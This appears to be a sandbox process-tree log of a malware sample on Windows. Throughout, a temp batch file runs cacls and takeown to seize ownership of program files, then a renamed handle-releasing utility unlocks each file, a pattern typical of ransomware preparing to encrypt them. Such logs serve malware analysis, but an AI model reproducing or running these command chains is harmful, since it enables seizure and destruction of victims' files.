C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵PID:368
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Modifies file permissions
PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Journal.exe" -nobanner3⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Journal.exe" -nobanner4⤵PID:2036
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵PID:1088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Seyes.jtp" -nobanner3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Seyes.jtp" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:472
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:1796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵
- Modifies file permissions
PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "create_form.gif" -nobanner3⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "create_form.gif" -nobanner4⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "info.gif" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "info.gif" -nobanner4⤵PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "trash.gif" -nobanner3⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "trash.gif" -nobanner4⤵PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵
- Modifies file permissions
PID:688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:528
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:1332
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:1212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "can.hyp" -nobanner3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "can.hyp" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "usa37.hyp" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "usa37.hyp" -nobanner4⤵PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:1796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:1996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1340
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:1136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:1584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "background.png" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "background.png" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "watermark.png" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "watermark.png" -nobanner4⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "directories.acrodata" -nobanner3⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PDIALOG.exe" -nobanner3⤵PID:660
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PDIALOG.exe" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵PID:1832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Shorthand.jtp" -nobanner3⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Shorthand.jtp" -nobanner4⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1560
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵
- Modifies file permissions
PID:672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:2040
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1200
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵PID:1492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "blank.jtp" -nobanner3⤵PID:1340
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "blank.jtp" -nobanner4⤵PID:1784
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:1460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:1584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Modifies file permissions
PID:1936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:1584
-
